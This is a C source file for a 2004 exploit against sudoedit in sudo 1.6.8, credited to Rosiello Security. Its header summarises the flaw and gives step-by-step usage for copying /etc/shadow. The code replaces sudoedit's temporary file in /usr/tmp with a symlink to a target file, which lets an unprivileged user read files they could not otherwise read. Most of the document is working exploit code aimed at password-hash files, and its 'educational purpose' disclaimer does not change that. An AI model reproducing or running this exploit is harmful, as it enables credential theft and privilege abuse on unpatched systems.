sudo_exploit.c

1. /*
2.  
3.            Copyright ? Rosiello Security 2004
4.                 http://www.rosiello.org
5.  
6.                   sudoedit Exploit
7.  
8.  
9. SOFTWARE : sudoedit
10. REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
11. DATE: 18/09/2004
12.  
13. Summary:
14. A flaw in exists in sudo's -u option (aka sudoedit)
15. in sudo version 1.6.8 that can give an attacker
16. read permission to a file that would otherwise be
17. unreadable.
18.  
19. Sudo versions affected:
20. 1.6.8 only
21.  
22. Credit:
23. Reznic Valery discovered the problem.
24.  
25. -----------------------------------------------------------
26.  
27. All the information that you can find in this software
28. were published for educational and didactic purpose only.
29. The author published this program under the condition
30. that is not in the intention of the reader to use them
31. in order to bring to himself or others a profit or to bring
32. to others damage.
33.  
34. !Respect the law!
35.  
36. How do I use this code ?
37.  
38. To exploit sudoedit you have to open with it the
39. file "rosiello" as shown in the example.
40.  
41. EXAMPLE SCENARIO:
42.  
43. 1) Open two shells (i) and (ii);
44. 2) (i)$sudoedit rosiello;
45. 3) (ii)$./sudoedit-exploit /etc/shadow;
46. 4) (i) close sudoedit.
47.  
48. The file "rosiello" is now a copy of "/etc/shadow".
49.  
50. AUTHOR : Angelo Rosiello
51. CONTACT: angelo@rosiello.org
52.  
53. */
54.  
55. #include <stdio.h>
56. #include <sys/stat.h>
57. #include <string.h>
58. #include <sys/types.h>
59. #include <fcntl.h>
60. #include <stdio.h>
61. #include <dirent.h>
62.  
63.  
64. int main( int argc, char *argv[] )
65. {
66.         char PATH[]="/usr/tmp";
67.         char file[32];
68.         DIR *tmp;
69.         struct dirent *de;
70.         tmp = opendir ( PATH );
71.         int found = 0;
72.  
73.         printf( "Copyright ?? Rosiello Security 2004\n" );
74.         printf( "http://www.rosiello.org\n" );
75.  
76.         if( argc!=2 )
77.         {
78.                 printf( "USAGE: %s file\n", argv[0] );
79.                 return( 0 );
80.         }
81.  
82.  
83.         while ( (de = readdir ( tmp ))!= NULL )
84.         {
85.                 if ( (strstr(de->d_name, "rosiello") != NULL) )
86.                 {
87.                         if( strlen(de->d_name) > 24 ) return( 0 );
88.                         sprintf( file, "%s/%s", PATH, (char *)de->d_name );
89.                         remove( file );
90.                         if( fork()!=0 )
91.                         {
92.                                 execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
93.                         }
94.                         wait( );
95.                         printf( "Now you can close sudoedit and reopen rosiello!\n" );
96.                         found=1;
97.                         goto end;
98.  
99.                 }
100.  
101.         }
102.         end:
103.         closedir( tmp );
104.  
105.         if( !found )
106.                 printf( "File Not Found!\n" );
107.         return( 0 );
108.  
109. }